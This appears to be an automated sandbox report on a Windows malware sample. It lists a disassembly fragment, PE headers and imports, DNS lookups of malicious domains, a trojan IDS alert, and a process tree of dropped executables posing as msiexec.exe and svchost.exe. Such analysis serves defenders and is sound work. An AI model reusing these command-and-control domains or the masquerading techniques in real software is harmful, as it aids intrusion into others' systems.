          push 00008001h
          call dword ptr [004070B0h]
          push ebx
          call dword ptr [0040727Ch]
          push 00000008h
          mov dword ptr [0042EC18h], eax
          call 00007FEEC5176316h
          mov dword ptr [0042EB64h], eax
          push ebx
          lea eax, dword ptr [esp+34h]
          push 00000160h
          push eax
          push ebx
          push 00428F98h
          call dword ptr [00407158h]
          push 00409154h
          push 0042E360h
          call 00007FEEC5175FC9h
          call dword ptr [004070ACh]
          mov edi, 00434000h
          push eax
          push edi
          call 00007FEEC5175FB7h
          push ebx
          call dword ptr [0040710Ch]
          cmp byte ptr [00434000h], 00000022h
          mov dword ptr [0042EB60h], eax
          mov eax, edi
          jne 00007FEEC517372Ch
          mov byte ptr [esp+14h], 00000022h
          mov eax, 00434001h
          push dword ptr [esp+14h]
          push eax
          call 00007FEEC5175AAAh
          push eax
          call dword ptr [0040721Ch]
          mov dword ptr [esp+1Ch], eax
          jmp 00007FEEC5173785h
          cmp cl, 00000020h
          jne 00007FEEC5173728h
          inc eax
          cmp byte ptr [eax], 00000020h
          je 00007FEEC517371Ch
          cmp byte ptr [eax], 00000022h
          mov byte ptr [eax+eax+00h], 00000000h
          Programming Language:
          • [EXP] VC++ 6.0 SP5 build 8804
          NameVirtual AddressVirtual Size Is in Section
          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_IMPORT0x74b00xb4.rdata
          IMAGE_DIRECTORY_ENTRY_RESOURCE0x370000x43f8.rsrc
          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_IAT0x70000x28c.rdata
          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
          .text0x10000x5c4c0x5e00False0.6697140957446809data6.440105549497952IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          .rdata0x70000x129c0x1400False0.43359375data5.046835307909969IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          .data0x90000x25c580x400False0.5849609375data4.801003752715384IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          .ndata0x2f0000x80000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          .rsrc0x370000x43f80x4400False0.16670496323529413data2.6375067972964095IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          NameRVASizeTypeLanguageCountryZLIB Complexity
          RT_ICON0x372380x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216EnglishUnited States0.09076763485477178
          RT_ICON0x397e00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096EnglishUnited States0.14118198874296436
          RT_ICON0x3a8880x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.3891843971631206
          RT_DIALOG0x3acf00x100dataEnglishUnited States0.5234375
          RT_DIALOG0x3adf00x11cdataEnglishUnited States0.6056338028169014
          RT_DIALOG0x3af100x60dataEnglishUnited States0.7291666666666666
          RT_GROUP_ICON0x3af700x30dataEnglishUnited States0.8541666666666666
          RT_VERSION0x3afa00x184MS Windows COFF Alpha object fileEnglishUnited States0.5463917525773195
          RT_MANIFEST0x3b1280x2ccXML 1.0 document, ASCII text, with very long lines (716), with no line terminatorsEnglishUnited States0.5656424581005587
          DLLImport
          KERNEL32.dllCompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, GetWindowsDirectoryA, SetFileTime, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetTempPathA
          USER32.dllEndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
          GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
          SHELL32.dllSHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
          ADVAPI32.dllRegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
          COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
          ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
          VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA
          Language of compilation systemCountry where language is spokenMap
          EnglishUnited States
          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
          147.75.61.38192.168.2.2280491662031515 10/01/23-06:01:37.455932TCP2031515ET TROJAN Known Sinkhole Response Kryptos Logic8049166147.75.61.38192.168.2.22
          TimestampSource PortDest PortSource IPDest IP
          Oct 1, 2023 06:01:37.211152077 CEST4916680192.168.2.22147.75.61.38
          Oct 1, 2023 06:01:37.333363056 CEST8049166147.75.61.38192.168.2.22
          Oct 1, 2023 06:01:37.333457947 CEST4916680192.168.2.22147.75.61.38
          Oct 1, 2023 06:01:37.333792925 CEST4916680192.168.2.22147.75.61.38
          Oct 1, 2023 06:01:37.455874920 CEST8049166147.75.61.38192.168.2.22
          Oct 1, 2023 06:01:37.455931902 CEST8049166147.75.61.38192.168.2.22
          Oct 1, 2023 06:01:37.455969095 CEST8049166147.75.61.38192.168.2.22
          Oct 1, 2023 06:01:37.455986977 CEST4916680192.168.2.22147.75.61.38
          Oct 1, 2023 06:01:37.456039906 CEST4916680192.168.2.22147.75.61.38
          Oct 1, 2023 06:01:37.456289053 CEST4916680192.168.2.22147.75.61.38
          Oct 1, 2023 06:01:37.578176022 CEST8049166147.75.61.38192.168.2.22
          Oct 1, 2023 06:01:37.578208923 CEST8049166147.75.61.38192.168.2.22
          Oct 1, 2023 06:01:37.578372002 CEST8049166147.75.61.38192.168.2.22
          Oct 1, 2023 06:01:40.038088083 CEST4916780192.168.2.2234.29.71.138
          Oct 1, 2023 06:01:40.212160110 CEST804916734.29.71.138192.168.2.22
          Oct 1, 2023 06:01:40.212265968 CEST4916780192.168.2.2234.29.71.138
          Oct 1, 2023 06:01:40.212869883 CEST4916780192.168.2.2234.29.71.138
          Oct 1, 2023 06:01:40.386900902 CEST804916734.29.71.138192.168.2.22
          Oct 1, 2023 06:01:40.386976957 CEST804916734.29.71.138192.168.2.22
          Oct 1, 2023 06:01:40.387012005 CEST804916734.29.71.138192.168.2.22
          Oct 1, 2023 06:01:40.387048006 CEST4916780192.168.2.2234.29.71.138
          Oct 1, 2023 06:01:40.387104034 CEST4916780192.168.2.2234.29.71.138
          Oct 1, 2023 06:01:40.404280901 CEST4916780192.168.2.2234.29.71.138
          Oct 1, 2023 06:01:40.619858027 CEST804916734.29.71.138192.168.2.22
          TimestampSource PortDest PortSource IPDest IP
          Oct 1, 2023 06:01:20.029628992 CEST138138192.168.2.22192.168.2.255
          Oct 1, 2023 06:01:37.098201990 CEST5789453192.168.2.228.8.4.4
          Oct 1, 2023 06:01:37.210273027 CEST53578948.8.4.4192.168.2.22
          Oct 1, 2023 06:01:37.456758976 CEST5789553192.168.2.228.8.4.4
          Oct 1, 2023 06:01:37.855343103 CEST5482153192.168.2.228.8.8.8
          Oct 1, 2023 06:01:38.076950073 CEST53578958.8.4.4192.168.2.22
          Oct 1, 2023 06:01:38.080461025 CEST5471953192.168.2.228.8.8.8
          Oct 1, 2023 06:01:38.604868889 CEST53547198.8.8.8192.168.2.22
          Oct 1, 2023 06:01:38.610348940 CEST4988153192.168.2.228.8.8.8
          Oct 1, 2023 06:01:38.857579947 CEST5482153192.168.2.228.8.8.8
          Oct 1, 2023 06:01:39.133213043 CEST53498818.8.8.8192.168.2.22
          Oct 1, 2023 06:01:39.134609938 CEST137137192.168.2.22192.168.2.255
          Oct 1, 2023 06:01:39.871609926 CEST5482153192.168.2.228.8.8.8
          Oct 1, 2023 06:01:39.887109041 CEST137137192.168.2.22192.168.2.255
          Oct 1, 2023 06:01:40.016741037 CEST53548218.8.8.8192.168.2.22
          Oct 1, 2023 06:01:40.026393890 CEST53548218.8.8.8192.168.2.22
          Oct 1, 2023 06:01:40.651536942 CEST137137192.168.2.22192.168.2.255
          Oct 1, 2023 06:01:43.965873003 CEST53548218.8.8.8192.168.2.22
          Oct 1, 2023 06:03:19.729870081 CEST138138192.168.2.22192.168.2.255
          TimestampSource IPDest IPChecksumCodeType
          Oct 1, 2023 06:01:40.026474953 CEST192.168.2.228.8.8.8d024(Port unreachable)Destination Unreachable
          Oct 1, 2023 06:01:43.965990067 CEST192.168.2.228.8.8.8d014(Port unreachable)Destination Unreachable
          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
          Oct 1, 2023 06:01:37.098201990 CEST192.168.2.228.8.4.40x1234Standard query (0)xdqzpbcgrvkj.ruA (IP address)IN (0x0001)false
          Oct 1, 2023 06:01:37.456758976 CEST192.168.2.228.8.4.40x1234Standard query (0)anam0rph.suA (IP address)IN (0x0001)false
          Oct 1, 2023 06:01:37.855343103 CEST192.168.2.228.8.8.80xb02dStandard query (0)pe.suckmycocklameavindustry.inA (IP address)IN (0x0001)false
          Oct 1, 2023 06:01:38.080461025 CEST192.168.2.228.8.8.80x82e1Standard query (0)anam0rph.suA (IP address)IN (0x0001)false
          Oct 1, 2023 06:01:38.610348940 CEST192.168.2.228.8.8.80x2610Standard query (0)anam0rph.suA (IP address)IN (0x0001)false
          Oct 1, 2023 06:01:38.857579947 CEST192.168.2.228.8.8.80xb02dStandard query (0)pe.suckmycocklameavindustry.inA (IP address)IN (0x0001)false
          Oct 1, 2023 06:01:39.871609926 CEST192.168.2.228.8.8.80xb02dStandard query (0)pe.suckmycocklameavindustry.inA (IP address)IN (0x0001)false
          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
          Oct 1, 2023 06:01:37.210273027 CEST8.8.4.4192.168.2.220x1234No error (0)xdqzpbcgrvkj.ru147.75.61.38A (IP address)IN (0x0001)false
          Oct 1, 2023 06:01:37.210273027 CEST8.8.4.4192.168.2.220x1234No error (0)xdqzpbcgrvkj.ru147.75.63.87A (IP address)IN (0x0001)false
          Oct 1, 2023 06:01:38.076950073 CEST8.8.4.4192.168.2.220x1234Server failure (2)anam0rph.sunonenoneA (IP address)IN (0x0001)false
          Oct 1, 2023 06:01:38.604868889 CEST8.8.8.8192.168.2.220x82e1Server failure (2)anam0rph.sunonenoneA (IP address)IN (0x0001)false
          Oct 1, 2023 06:01:39.133213043 CEST8.8.8.8192.168.2.220x2610Server failure (2)anam0rph.sunonenoneA (IP address)IN (0x0001)false
          Oct 1, 2023 06:01:40.016741037 CEST8.8.8.8192.168.2.220xb02dNo error (0)pe.suckmycocklameavindustry.in34.29.71.138A (IP address)IN (0x0001)false
          Oct 1, 2023 06:01:40.026393890 CEST8.8.8.8192.168.2.220xb02dNo error (0)pe.suckmycocklameavindustry.in34.29.71.138A (IP address)IN (0x0001)false
          Oct 1, 2023 06:01:43.965873003 CEST8.8.8.8192.168.2.220xb02dServer failure (2)pe.suckmycocklameavindustry.innonenoneA (IP address)IN (0x0001)false
          • xdqzpbcgrvkj.ru
          • pe.suckmycocklameavindustry.in

          Click to jump to process

          Target ID:0
          Start time:06:01:19
          Start date:01/10/2023
          Path:C:\Users\user\Desktop\Hu25VEa8Dr.exe
          Wow64 process (32bit):true
          Commandline:C:\Users\user\Desktop\Hu25VEa8Dr.exe
          Imagebase:0x400000
          File size:196'227 bytes
          MD5 hash:BC76BD7B332AA8F6AEDBB8E11B7BA9B6
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:low
          Has exited:true

          Target ID:2
          Start time:06:01:19
          Start date:01/10/2023
          Path:C:\Users\user\AppData\Local\Temp\Sahofivizu.exe
          Wow64 process (32bit):true
          Commandline:C:\Users\user\AppData\Local\Temp\Sahofivizu.exe" "C:\Users\user\Desktop\Hu25VEa8Dr.exe
          Imagebase:0x400000
          File size:20'480 bytes
          MD5 hash:7FE00CC4EA8429629AC0AC610DB51993
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Antivirus matches:
          • Detection: 100%, Avira
          • Detection: 57%, ReversingLabs
          • Detection: 61%, Virustotal, Browse
          Reputation:low
          Has exited:true

          Target ID:3
          Start time:06:01:24
          Start date:01/10/2023
          Path:C:\Users\user\Desktop\Hu25VEa8Dr.exe
          Wow64 process (32bit):true
          Commandline:C:\Users\user\Desktop\Hu25VEa8Dr.exe
          Imagebase:0x400000
          File size:196'227 bytes
          MD5 hash:BC76BD7B332AA8F6AEDBB8E11B7BA9B6
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:low
          Has exited:true

          Target ID:4
          Start time:06:01:24
          Start date:01/10/2023
          Path:C:\Users\user\Desktop\Hu25VEa8Dr.exe
          Wow64 process (32bit):true
          Commandline:C:\Users\user\Desktop\Hu25VEa8Dr.exe
          Imagebase:0x400000
          File size:196'227 bytes
          MD5 hash:BC76BD7B332AA8F6AEDBB8E11B7BA9B6
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:low
          Has exited:true

          Target ID:5
          Start time:06:01:25
          Start date:01/10/2023
          Path:C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe
          Wow64 process (32bit):true
          Commandline:"C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe"
          Imagebase:0x400000
          File size:88'209 bytes
          MD5 hash:B3657BCFE8240BC0985093A0F8682703
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Antivirus matches:
          • Detection: 100%, Avira
          • Detection: 100%, Joe Sandbox ML
          • Detection: 87%, ReversingLabs
          • Detection: 85%, Virustotal, Browse
          Reputation:low
          Has exited:true

          Target ID:6
          Start time:06:01:26
          Start date:01/10/2023
          Path:C:\Users\user\AppData\Local\Temp\Lohonibuhod.exe
          Wow64 process (32bit):true
          Commandline:"C:\Users\user\AppData\Local\Temp\Lohonibuhod.exe" "C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe"
          Imagebase:0x400000
          File size:19'968 bytes
          MD5 hash:44902781C1865978B17F396DB51D85E1
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Antivirus matches:
          • Detection: 100%, Avira
          • Detection: 76%, ReversingLabs
          • Detection: 77%, Virustotal, Browse
          Reputation:low
          Has exited:true

          Target ID:7
          Start time:06:01:31
          Start date:01/10/2023
          Path:C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe
          Wow64 process (32bit):true
          Commandline:"C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe"
          Imagebase:0x400000
          File size:88'209 bytes
          MD5 hash:B3657BCFE8240BC0985093A0F8682703
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:low
          Has exited:true

          Target ID:8
          Start time:06:01:31
          Start date:01/10/2023
          Path:C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe
          Wow64 process (32bit):true
          Commandline:"C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe"
          Imagebase:0x400000
          File size:88'209 bytes
          MD5 hash:B3657BCFE8240BC0985093A0F8682703
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:low
          Has exited:true

          Target ID:9
          Start time:06:01:31
          Start date:01/10/2023
          Path:C:\Windows\SysWOW64\svchost.exe
          Wow64 process (32bit):true
          Commandline:C:\Windows\syswow64\svchost.exe
          Imagebase:0xcd0000
          File size:20'992 bytes
          MD5 hash:54A47F6B5E09A77E61649109C6A08866
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:low
          Has exited:true

          No disassembly